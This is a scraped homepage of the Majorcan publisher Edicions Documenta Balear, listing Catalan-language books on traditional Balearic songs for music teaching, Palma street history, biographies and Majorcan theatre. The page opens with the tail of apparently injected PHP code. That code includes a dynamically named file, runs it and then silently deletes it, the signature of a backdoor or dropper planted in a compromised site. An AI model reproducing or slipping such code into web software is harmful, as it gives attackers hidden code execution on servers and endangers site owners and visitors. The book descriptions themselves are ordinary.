");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Home
Alguns serveis

Segueix-nos

                                 &n ...

Comparteix

                                 &n ...

Necessitau algun fragment de les nostres obres?

                                              ...

TÍTOLS EN PREPARACIÓ

                                          &nb ...

Tota l'actualitat

Ding Dang

Liesegang Moll, Berta; Ribot i Mayol, Catalina

El mètode de llenguatge musical amb les cançons tradicionals de les illes Balears.

Aquest llibre pretén ser una eina pràctica de suport, un recurs pedagògic con- textualitzat per a l’ensenyament/aprenentatge del llenguatge musical. Val a dir, també, que moltes cançons, tretes de cançoners publicats i/o directament del poble, de vegades les hem escrit en diferents valors, compassos, tonalitats i/o tessitures per tal de poder-ne fer un ús més profitós.


Les autores de la col·lecció Ding Dang. La cançó popular de les Illes Balears: una eina de treball, de cinc volums, tenen una sòlida i dilatada formació musical i pedagògica, a més d’una llarga experiència docent en escoles de música i centres de primària i de secundària. Al seu moment enllestiren aquest projecte pioner davant la manca de material didàctic vehiculat amb cançons i tonades pròpies de les Illes Balears que permetés al mateix temps preservar el nostre patrimoni cultural musical i lingüístic.
Aquesta col·lecció és avui un referent a les Illes Balears en els mètodes d’ensenyament musical a les escoles de primària, escoles de música i conservatoris, perquè té un valor afegit:  tots els continguts a treballar parteixen de la selecció i l’adaptació seqüenciada de les nostres cançons i tonades tradicionals.
Ara més que mai, davant la globalització, cal actuar per no deixar perdre el patrimoni musical illenc, un ric i valuós tresor transmès oralment de generació en generació.


Llegir la Introducció i Orientacions didàctiques en PDF
Llegir els Índex en PDF
Veure una mostra en PDFEl carrer dels Oms

Terrasa García, Xavier

La història d’una de les vies públiques més antigues de Palma.


El carrer dels Oms és una de les vies públiques més antigues de Palma. Els seus orígens es remunten al segle XI, dins l’àmbit i els límits de Madina Mayurqa, i el topònim actual es va començar a emprar al segle XIV. Tradicionalment ha fet de camí per a anar de la part alta a la baixa de la ciutat.
La situació perifèrica de la zona, quasi adherida a les muralles musulmana i renaixentista, explica que fins al segle XVIII s’hi assentàs una gran quantitat d’horts. Un increment demogràfic al començament del segle XIX va comportar noves construccions i la instal·lació de petits tallers de manufactura, sobretot de sabaters. A partir del segon terç del segle XX s’hi varen establir empreses del sector serveis que varen coexistir amb els tallers de manufactura. En els darrers seixanta anys, el carrer dels Oms s’ha caracteritzat per ser una via de caire comercial.
Aquest treball pretén reconèixer l’activitat dels negocis que han format part de la seva història, quan es compleixen trenta anys de la conversió del carrer dels Oms com a zona de vianants.


Llegir la Introducció i el Sumari en PDF

Bartomeu Colom i Pastor

Nadal i Soler, Antoni

El perfil de la personalitat i la trajectòria
cívica d’un dels grans especialistes en dret autonòmic.


Jeroni Amengual Oliver (1878-1946)

Reynés i Muntaner, Guillem

La biografia d’una figura rellevant del periodisme i del teatre a Mallorca. Propietari de La Almudaina, periodista i empresari teatral.

El teatre mallorquí (segles XIX-XXI)

Nadal i Soler, Antoni

Panorama complet dels seus espais, els actors, els espectadors i els dramaturgs.